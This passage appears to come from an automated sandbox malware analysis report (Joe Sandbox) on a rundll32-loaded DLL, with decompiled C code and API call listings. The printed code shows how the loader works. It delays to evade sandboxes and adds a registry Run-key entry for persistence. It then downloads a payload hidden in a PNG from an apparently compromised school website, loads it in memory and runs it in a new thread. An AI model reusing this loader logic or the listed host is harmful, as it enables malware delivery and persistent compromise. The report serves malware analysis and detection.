0x5ade25f8
0x5ade260c
0x5ade2611
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 5ADE233B: LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384
Part of subcall function 5ADE233B: LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Part of subcall function 5ADE240D: GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE2428
Part of subcall function 5ADE240D: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,0002001B,?), ref: 5ADE2446
Part of subcall function 5ADE240D: wsprintfA.USER32 ref: 5ADE2467
Part of subcall function 5ADE240D: RegQueryValueExA.KERNEL32(?,#3,00000000,00000000,?,?), ref: 5ADE248C
Part of subcall function 5ADE240D: lstrcmpiA.KERNEL32(?,?), ref: 5ADE24A4
Part of subcall function 5ADE240D: lstrlenA.KERNEL32(?), ref: 5ADE24B5
Part of subcall function 5ADE240D: RegSetValueExA.ADVAPI32(?,#3,00000000,00000001,?,00000000), ref: 5ADE24D4
Part of subcall function 5ADE240D: RegCloseKey.ADVAPI32(?,-00000001), ref: 5ADE24E4

Part of subcall function 5ADE1032: StrStrA.SHLWAPI(00000000,accepted-), ref: 5ADE1201
Part of subcall function 5ADE1032: StrToIntA.SHLWAPI(00000000), ref: 5ADE1268
Part of subcall function 5ADE1032: lstrlenA.KERNEL32(00000000), ref: 5ADE1284
Part of subcall function 5ADE1032: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE1299
Part of subcall function 5ADE1032: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE12B3
Part of subcall function 5ADE1032: lstrlenA.KERNEL32(00000000), ref: 5ADE12D4
Part of subcall function 5ADE1032: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE12E9
Part of subcall function 5ADE1032: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE1303
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(?,00000000,00008000), ref: 5ADE13A3
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 5ADE13B3
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(00000000,00008000), ref: 5ADE13E1

GetTickCount.KERNEL32 ref: 5ADE258C
Sleep.KERNELBASE(00000002), ref: 5ADE259A
GetTickCount.KERNEL32 ref: 5ADE25A0
SetUnhandledExceptionFilter.KERNEL32(#5), ref: 5ADE25B8
GetModuleFileNameW.KERNEL32(?,00000400), ref: 5ADE25D0
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 5ADE25E7
lstrlenW.KERNEL32(?), ref: 5ADE25F8
PathRemoveExtensionW.SHLWAPI(?), ref: 5ADE2623
lstrlenW.KERNEL32(?), ref: 5ADE2630
VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000004), ref: 5ADE2685
GetModuleHandleA.KERNEL32(00000000,00000000,5ADE1B1D,00000000,?,www.diefenbachgymnasium.at,/sites/all/themes/diefenbach/small_logo.png,00A00000,5ADE1E04,?,?,?,?), ref: 5ADE275E
#1.AZGYRFHY(?,00000001,5ADE2570,5ADE0000,016DFFF8,00000000,00000000,?,www.diefenbachgymnasium.at,/sites/all/themes/diefenbach/small_logo.png,00A00000,5ADE1E04,?,?,?,?), ref: 5ADE2789

Part of subcall function 5ADE250C: lstrcmpA.KERNEL32(?,00000000,00000000,?), ref: 5ADE253A

CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 5ADE279D
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 5ADE27AA
GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE27C7
wsprintfA.USER32 ref: 5ADE27E0
WinExec.KERNEL32(?,00000000), ref: 5ADE27F2

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 5ADE2570, Relevance: 13.6, APIs: 9, Instructions: 64

C-Code - Quality: 74%

			E5ADE2570(intOrPtr* __eax, void* __edx) {
				intOrPtr _v119;
				char _v1028;
				short _v3076;
				short _v5124;
				intOrPtr _v5128;
				char _v5132;
				char _v5136;
				void _v5648;
				void* __ebx;
				void* __esi;
				void* _t38;
				void* _t39;
				void* _t46;
				short* _t51;
				void _t52;
				struct HINSTANCE__* _t57;
				void* _t58;
				void* _t62;
				WCHAR* _t63;
				WCHAR* _t65;
				signed int _t67;
				signed int _t79;
				WCHAR* _t90;
				void* _t92;

				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				_pop(ds);
				_v119 = _v119 + __edx;
				_push(_t90);
				_v5124 = GetTickCount();
				do {
					Sleep(2); // executed
				} while (GetTickCount() - _v5128 < 0x13880);
				SetUnhandledExceptionFilter(E5ADE27FA);
				if(GetModuleFileNameW( *0x5ade256c,  &_v3076, 0x400) == 0) {
					L10:
					E5ADE24ED(); // executed
					_t38 = E5ADE233B(); // executed
					__eflags = _t38;
					if(_t38 == 0) {
						L24:
						return _t38;
					}
					_t39 = E5ADE240D(); // executed
					__eflags = _t39 - 0xffffffff;
					if(_t39 == 0xffffffff) {
						GetModuleFileNameA( *0x5ade256c,  &_v5124, 0x400);
						wsprintfA( &_v1028, "rundll32 \"%s\", #2",  &_v5124);
						WinExec( &_v1028, 0);
						ExitProcess(0);
					}
					_t46 = VirtualAlloc(0, 0xa00000, 0x3000, 4); // executed
					_t38 = _t46;
					__eflags = _t38;
					if(__eflags == 0) {
						goto L24;
					}
					 *0x5ade1e08 = _t38;
					asm("cld");
					memset( &_v5648, 0, 0x100 << 0);
					_t76 =  &_v5648;
					E5ADE1EE6( &_v5648,  &_v5136, _t90, __eflags,  &_v5132,  &_v5136,  &_v5132); // executed
					_t51 =  &_v5648;
					__eflags = _v5136 - 2;
					if(_v5136 != 2) {
						_t51 = 0;
						_t76 = 0;
						__eflags = L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6";
						if(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6" != 0) {
							_t76 = L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6";
						}
					}
					_t38 = E5ADE1032(_t76, L"www.diefenbachgymnasium.at", L"/sites/all/themes/diefenbach/small_logo.png",  *0x5ade1e08, 0xa00000, E5ADE1E04, _t51); // executed
					__eflags =  *E5ADE1E04;
					if( *E5ADE1E04 != 0) {
						_t92 =  *0x5ade1e08; // 0x16e0000
						asm("repe cmpsb");
						__eflags = 8;
						if(8 != 0) {
							goto L24;
						} else {
							goto L18;
						}
						while(1) {
							L18:
							_t52 =  *_t92;
							asm("bswap eax");
							__eflags =  *((intOrPtr*)(_t52 + _t92 + 0x10)) - 0x54414449;
							if( *((intOrPtr*)(_t52 + _t92 + 0x10)) == 0x54414449) {
								break;
							}
							_t92 = _t92 + _t52 + 0xc;
						}
						_push(_t52);
						E5ADE161A(_t92 + 8, _t52, 0x5ade1b1d);
						 *0x5ade170a = GetProcAddress;
						GetModuleHandleA(0);
						_t57 =  *0x5ade256c; // 0x5ade0000
						_t58 = E5ADE18DF(__eflags, _t57, _t92 + 8, 0, 0); // executed
						_t38 = _t58;
						__eflags = _t38;
						if(_t38 != 0) {
							 *_t38(8, 1, E5ADE2570);
							_t38 = E5ADE250C("processes_other_side_lower", 8);
							__eflags = _t38;
							if(_t38 != 0) {
								_t62 = CreateThread(0, 0, _t38, 0, 0, 0); // executed
								_t38 = _t62;
								__eflags = _t38;
								if(_t38 != 0) {
									_t38 = WaitForSingleObject(_t38, 0xffffffff);
								}
							}
						}
					}
					goto L24;
				}
				_t63 =  &_v5124;
				__imp__SHGetSpecialFolderPathW(0, _t63, 0x10, 0); // executed
				if(_t63 == 0) {
					L6:
					_t65 =  &_v3076;
					 *0x5ade257c = _t65;
					PathRemoveExtensionW(_t65);
					_t67 = lstrlenW( &_v3076);
					_t79 = _t67;
					_t90 =  &_v3076;
					L7:
					if( *((short*)(_t90 + _t79 * 2)) != 0x5c) {
						_t79 = _t79 - 1;
						asm("jecxz 0x10");
						goto L7;
					}
					_t38 = _t67 - _t79 - 1;
					__eflags = _t38 - 0x20;
					if(_t38 == 0x20) {
						goto L24;
					}
					goto L10;
				}
				_t38 = lstrlenW( &_v5124);
				asm("repe cmpsw");
				if(_t38 == 0) {
					goto L24;
				}
				goto L6;
			}

0x5ade2570
0x5ade2572
0x5ade2574
0x5ade2576
0x5ade2578
0x5ade257a
0x5ade257e
0x5ade257f
0x5ade2589
0x5ade2592
0x5ade2598
0x5ade259a
0x5ade25ac
0x5ade25b8
0x5ade25d8
0x5ade2656
0x5ade2656
0x5ade265b
0x5ade2660
0x5ade2663
0x5ade27b0
0x5ade27b4
0x5ade27b4
0x5ade2669
0x5ade266e
0x5ade2671
0x5ade27c7
0x5ade27e0
0x5ade27f2
0x5ade27fc
0x5ade27fc
0x5ade2685
0x5ade268b
0x5ade268b
0x5ade268d
0x00000000
0x00000000
0x5ade2693
0x5ade2698
0x5ade26a6
0x5ade26ae
0x5ade26bd
0x5ade26c2
0x5ade26c8
0x5ade26cf
0x5ade26d1
0x5ade26d3
0x5ade26d5
0x5ade26dd
0x5ade26df
0x5ade26df
0x5ade26dd
0x5ade2700
0x5ade2705
0x5ade270c
0x5ade2712
0x5ade2722
0x5ade2724
0x5ade2726
0x00000000
0x00000000
0x00000000
0x00000000
0x5ade272c
0x5ade272c
0x5ade272c
0x5ade272e
0x5ade2730
0x5ade2738
0x00000000
0x00000000
0x5ade273c
0x5ade273c
0x5ade2744
0x5ade274c
0x5ade2757
0x5ade275e
0x5ade2764
0x5ade276f
0x5ade2774
0x5ade2774
0x5ade2776
0x5ade2782
0x5ade278e
0x5ade278e
0x5ade2790
0x5ade279d
0x5ade27a3
0x5ade27a3
0x5ade27a5
0x5ade27aa
0x5ade27aa
0x5ade27a5
0x5ade2790
0x5ade2776
0x00000000
0x5ade270c
0x5ade25da
0x5ade25e7
0x5ade25ef
0x5ade2617
0x5ade2617
0x5ade261d
0x5ade2623
0x5ade2630
0x5ade2636
0x5ade2638
0x5ade263e
0x5ade2643
0x5ade2645
0x5ade2646
0x00000000
0x5ade2646
0x5ade264c
0x5ade264d
0x5ade2650
0x00000000
0x00000000
0x00000000
0x5ade2650
0x5ade25f8
0x5ade260c
0x5ade2611
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 5ADE233B: LoadLibraryA.KERNEL32(advapi32.dll), ref: 5ADE2384
Part of subcall function 5ADE233B: LoadLibraryA.KERNEL32(winhttp.dl), ref: 5ADE23B4

Part of subcall function 5ADE240D: GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE2428
Part of subcall function 5ADE240D: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,0002001B,?), ref: 5ADE2446
Part of subcall function 5ADE240D: wsprintfA.USER32 ref: 5ADE2467
Part of subcall function 5ADE240D: RegQueryValueExA.KERNEL32(?,#3,00000000,00000000,?,?), ref: 5ADE248C
Part of subcall function 5ADE240D: lstrcmpiA.KERNEL32(?,?), ref: 5ADE24A4
Part of subcall function 5ADE240D: lstrlenA.KERNEL32(?), ref: 5ADE24B5
Part of subcall function 5ADE240D: RegSetValueExA.ADVAPI32(?,#3,00000000,00000001,?,00000000), ref: 5ADE24D4
Part of subcall function 5ADE240D: RegCloseKey.ADVAPI32(?,-00000001), ref: 5ADE24E4

Part of subcall function 5ADE1032: StrStrA.SHLWAPI(00000000,accepted-), ref: 5ADE1201
Part of subcall function 5ADE1032: StrToIntA.SHLWAPI(00000000), ref: 5ADE1268
Part of subcall function 5ADE1032: lstrlenA.KERNEL32(00000000), ref: 5ADE1284
Part of subcall function 5ADE1032: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE1299
Part of subcall function 5ADE1032: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE12B3
Part of subcall function 5ADE1032: lstrlenA.KERNEL32(00000000), ref: 5ADE12D4
Part of subcall function 5ADE1032: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE12E9
Part of subcall function 5ADE1032: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE1303
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(?,00000000,00008000), ref: 5ADE13A3
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 5ADE13B3
Part of subcall function 5ADE1032: VirtualFree.KERNEL32(00000000,00008000), ref: 5ADE13E1

GetTickCount.KERNEL32 ref: 5ADE258C
Sleep.KERNELBASE(00000002), ref: 5ADE259A
GetTickCount.KERNEL32 ref: 5ADE25A0
SetUnhandledExceptionFilter.KERNEL32(#5), ref: 5ADE25B8
GetModuleFileNameW.KERNEL32(?,00000400), ref: 5ADE25D0
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 5ADE25E7
lstrlenW.KERNEL32(?), ref: 5ADE25F8
PathRemoveExtensionW.SHLWAPI(?), ref: 5ADE2623
lstrlenW.KERNEL32(?), ref: 5ADE2630
VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000004), ref: 5ADE2685
GetModuleHandleA.KERNEL32(00000000,00000000,5ADE1B1D,00000000,?,www.diefenbachgymnasium.at,/sites/all/themes/diefenbach/small_logo.png,00A00000,5ADE1E04,?,?,?,?), ref: 5ADE275E
#1.AZGYRFHY(?,00000001,5ADE2570,5ADE0000,016DFFF8,00000000,00000000,?,www.diefenbachgymnasium.at,/sites/all/themes/diefenbach/small_logo.png,00A00000,5ADE1E04,?,?,?,?), ref: 5ADE2789

Part of subcall function 5ADE250C: lstrcmpA.KERNEL32(?,00000000,00000000,?), ref: 5ADE253A

CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 5ADE279D
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 5ADE27AA
GetModuleFileNameA.KERNEL32(?,00000400), ref: 5ADE27C7
wsprintfA.USER32 ref: 5ADE27E0
WinExec.KERNEL32(?,00000000), ref: 5ADE27F2

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 00239E1A, Relevance: 33.3, APIs: 22, Instructions: 299

APIs

GetTickCount.KERNEL32 ref: 00239E35

Part of subcall function 00230A70: GetCurrentThread.KERNEL32 ref: 00230A89
Part of subcall function 00230A70: OpenThreadToken.ADVAPI32 ref: 00230AA8
Part of subcall function 00230A70: LookupPrivilegeValueW.ADVAPI32 ref: 00230AD2
Part of subcall function 00230A70: AdjustTokenPrivileges.ADVAPI32 ref: 00230B32
Part of subcall function 00230A70: CloseHandle.KERNEL32 ref: 00230B48
Part of subcall function 00230A70: GetLastError.KERNEL32 ref: 00230B60
Part of subcall function 00230A70: ImpersonateSelf.ADVAPI32 ref: 00230B74
Part of subcall function 00230A70: GetCurrentThread.KERNEL32 ref: 00230B81
Part of subcall function 00230A70: OpenThreadToken.ADVAPI32 ref: 00230B9A
Part of subcall function 00230A70: GetLastError.KERNEL32 ref: 00230BB2

Part of subcall function 002352C0: LoadLibraryW.KERNEL32 ref: 002352DB
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,00000000,00239E77), ref: 00235302
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,00239E77), ref: 0023531C
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 00235336
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 00235350
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00239E77), ref: 0023536A
Part of subcall function 002352C0: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00235384
Part of subcall function 002352C0: FreeLibrary.KERNEL32 ref: 002353DB

Part of subcall function 00235430: SetThreadExecutionState.KERNEL32 ref: 002354A5
Part of subcall function 00235430: SetThreadExecutionState.KERNEL32 ref: 002354CC

GdiplusStartup.GDIPLUS ref: 00239E98

Part of subcall function 0022DCC0: time.MSVCRT ref: 0022DCCA
Part of subcall function 0022DCC0: srand.MSVCRT ref: 0022DCD2

Part of subcall function 0022F5E0: CreateEventW.KERNEL32 ref: 0022F616

Part of subcall function 002276B0: CreateEventW.KERNEL32 ref: 002276D2
Part of subcall function 002276B0: CreateThread.KERNEL32 ref: 00227713

Sleep.KERNELBASE ref: 00239EE7
GetTickCount.KERNEL32 ref: 00239EF0
GetTickCount.KERNEL32 ref: 00239F69
GetTickCount.KERNEL32 ref: 00239F71
GetTickCount.KERNEL32 ref: 00239F85
GetTickCount.KERNEL32 ref: 00239FA7
Sleep.KERNEL32 ref: 00239FDF

Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EB7B
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EB87
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EB93
Part of subcall function 0022EAE0: Sleep.KERNEL32 ref: 0022EBA9
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022ED81
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022ED8D
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022ED99
Part of subcall function 0022EAE0: free.MSVCRT ref: 0022EDAF

Sleep.KERNEL32 ref: 0023A01D
GetTickCount.KERNEL32 ref: 0023A033
Sleep.KERNEL32 ref: 0023A04F
Sleep.KERNEL32 ref: 0023A069
GetTickCount.KERNEL32 ref: 0023A074

Part of subcall function 0022E660: free.MSVCRT ref: 0022E6C7
Part of subcall function 0022E660: free.MSVCRT ref: 0022E6D3
Part of subcall function 0022E660: Sleep.KERNEL32 ref: 0022E6EA
Part of subcall function 0022E660: realloc.MSVCRT ref: 0022E7FE
Part of subcall function 0022E660: free.MSVCRT ref: 0022E827
Part of subcall function 0022E660: free.MSVCRT ref: 0022E833

Part of subcall function 0022FAB0: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000001,00000000,773DC380,0023A0E9), ref: 0022FB07
Part of subcall function 0022FAB0: calloc.MSVCRT ref: 0022FB61
Part of subcall function 0022FAB0: realloc.MSVCRT ref: 0022FBC9
Part of subcall function 0022FAB0: strlen.MSVCRT ref: 0022FBD9
Part of subcall function 0022FAB0: memcpy.MSVCRT ref: 0022FBEC

calloc.MSVCRT ref: 0023A0FF
MultiByteToWideChar.KERNEL32 ref: 0023A12C
free.MSVCRT ref: 0023A169
free.MSVCRT ref: 0023A177

Part of subcall function 002353F0: FreeLibrary.KERNEL32(?,?,?,?,?,?,0023A19A), ref: 0023540B

Part of subcall function 0022F660: CloseHandle.KERNEL32 ref: 0022F66B

Part of subcall function 00227650: TerminateThread.KERNEL32 ref: 00227667
Part of subcall function 00227650: CloseHandle.KERNEL32 ref: 00227678
Part of subcall function 00227650: CloseHandle.KERNEL32 ref: 00227697

Part of subcall function 0022DD40: free.MSVCRT(?,?,00000000,773DC380,0023A1AF), ref: 0022DD53

Part of subcall function 00231A10: RegOpenKeyExW.KERNEL32 ref: 00231A4B
Part of subcall function 00231A10: RegQueryValueExW.ADVAPI32 ref: 00231A89
Part of subcall function 00231A10: RegCloseKey.ADVAPI32 ref: 00231A9B
Part of subcall function 00231A10: calloc.MSVCRT ref: 00231ABD
Part of subcall function 00231A10: RegQueryValueExW.ADVAPI32 ref: 00231AEF
Part of subcall function 00231A10: free.MSVCRT ref: 00231AFB

Part of subcall function 0022FE00: lstrlenW.KERNEL32 ref: 0022FE2F
Part of subcall function 0022FE00: calloc.MSVCRT ref: 0022FE49
Part of subcall function 0022FE00: WideCharToMultiByte.KERNEL32 ref: 0022FE8A
Part of subcall function 0022FE00: lstrlenA.KERNEL32 ref: 0022FE96
Part of subcall function 0022FE00: free.MSVCRT ref: 0022FEBB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FF0B
Part of subcall function 0022FE00: SetCurrentDirectoryW.KERNEL32 ref: 0022FF33
Part of subcall function 0022FE00: free.MSVCRT ref: 0022FF45
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FF6D
Part of subcall function 0022FE00: free.MSVCRT ref: 0022FF82
Part of subcall function 0022FE00: lstrlenW.KERNEL32 ref: 0022FF8E
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FFCB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0022FFFB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023002B
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023004D
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023006F
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230091
Part of subcall function 0022FE00: GetTempPathW.KERNEL32 ref: 002300AC
Part of subcall function 0022FE00: SetCurrentDirectoryW.KERNEL32(773E5431,773E5431), ref: 002300C8
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002300E9
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230168
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002301E3
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230272
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 0023027D
Part of subcall function 0022FE00: free.MSVCRT ref: 002302D4
Part of subcall function 0022FE00: free.MSVCRT ref: 002302E0
Part of subcall function 0022FE00: free.MSVCRT ref: 002302E8
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230309
Part of subcall function 0022FE00: GetTempPathW.KERNEL32 ref: 00230342
Part of subcall function 0022FE00: GetTempFileNameW.KERNEL32 ref: 00230374
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230390
Part of subcall function 0022FE00: lstrlenW.KERNEL32 ref: 002303A5
Part of subcall function 0022FE00: calloc.MSVCRT ref: 002303BE
Part of subcall function 0022FE00: memcpy.MSVCRT ref: 002303DF
Part of subcall function 0022FE00: free.MSVCRT ref: 002303F2
Part of subcall function 0022FE00: free.MSVCRT ref: 002303FA
Part of subcall function 0022FE00: calloc.MSVCRT ref: 00230424
Part of subcall function 0022FE00: calloc.MSVCRT ref: 0023049C
Part of subcall function 0022FE00: calloc.MSVCRT ref: 002304DE
Part of subcall function 0022FE00: memcpy.MSVCRT ref: 002304FC
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230528
Part of subcall function 0022FE00: wcslen.MSVCRT ref: 00230584
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230597
Part of subcall function 0022FE00: free.MSVCRT ref: 002305D8
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002305F9
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230648
Part of subcall function 0022FE00: free.MSVCRT ref: 0023066B
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230680
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 002306AB
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002306E6
Part of subcall function 0022FE00: _wtoi.MSVCRT ref: 00230711
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023073E
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230773
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023079F
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002307C0
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002307E1
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 00230802
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023082A
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023084B
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023086C
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023088D
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002308B5
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002308D6
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 002308F7
Part of subcall function 0022FE00: GetFullPathNameW.KERNEL32 ref: 00230963
Part of subcall function 0022FE00: free.MSVCRT ref: 00230979
Part of subcall function 0022FE00: lstrcmpW.KERNEL32 ref: 0023098E
Part of subcall function 0022FE00: GetFileAttributesW.KERNEL32 ref: 002309B5
Part of subcall function 0022FE00: wcslen.MSVCRT ref: 002309C3
Part of subcall function 0022FE00: wcslen.MSVCRT ref: 002309D6
Part of subcall function 0022FE00: RemoveDirectoryW.KERNEL32 ref: 00230A4A

free.MSVCRT ref: 0023A21A
free.MSVCRT ref: 0023A225

Part of subcall function 00221560: free.MSVCRT(?,?,00000000,00000000,0023A237), ref: 00221571

lstrlenW.KERNEL32 ref: 0023A24D
lstrlenW.KERNEL32 ref: 0023A290

Part of subcall function 0022E860: free.MSVCRT ref: 0022E8E4
Part of subcall function 0022E860: free.MSVCRT ref: 0022E8F0
Part of subcall function 0022E860: free.MSVCRT ref: 0022E8FC
Part of subcall function 0022E860: free.MSVCRT ref: 0022E908
Part of subcall function 0022E860: Sleep.KERNEL32 ref: 0022E91E
Part of subcall function 0022E860: free.MSVCRT ref: 0022EA98
Part of subcall function 0022E860: free.MSVCRT ref: 0022EAA4
Part of subcall function 0022E860: free.MSVCRT ref: 0022EAB0
Part of subcall function 0022E860: free.MSVCRT ref: 0022EABC

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 5ADE1032, Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 292

APIs

StrStrA.SHLWAPI(00000000,accepted-), ref: 5ADE1201
StrToIntA.SHLWAPI(00000000), ref: 5ADE1268
lstrlenA.KERNEL32(00000000), ref: 5ADE1284
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE1299
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE12B3
lstrlenA.KERNEL32(00000000), ref: 5ADE12D4
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000004), ref: 5ADE12E9
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001), ref: 5ADE1303
VirtualFree.KERNEL32(?,00000000,00008000), ref: 5ADE13A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 5ADE13B3
VirtualFree.KERNEL32(00000000,00008000), ref: 5ADE13E1

Strings

.dll, xrefs: 5ADE111C
http, xrefs: 5ADE1228
pi32, xrefs: 5ADE1177, 5ADE1356
adva, xrefs: 5ADE1157, 5ADE133D
accepted-, xrefs: 5ADE11FB
GET, xrefs: 5ADE114F, 5ADE1337

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 63C0767C, Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 248

APIs

Part of subcall function 63C07EC0: VirtualAlloc.KERNEL32 ref: 63C07F6D
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C07F90
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C07FDE
Part of subcall function 63C07EC0: GetProcessHeap.KERNEL32 ref: 63C08094
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C080B7
Part of subcall function 63C07EC0: GetVersionExA.KERNEL32 ref: 63C0813D
Part of subcall function 63C07EC0: HeapAlloc.KERNEL32 ref: 63C08186
Part of subcall function 63C07EC0: memcpy.MSVCRT ref: 63C081A4
Part of subcall function 63C07EC0: wcslen.MSVCRT ref: 63C081C0
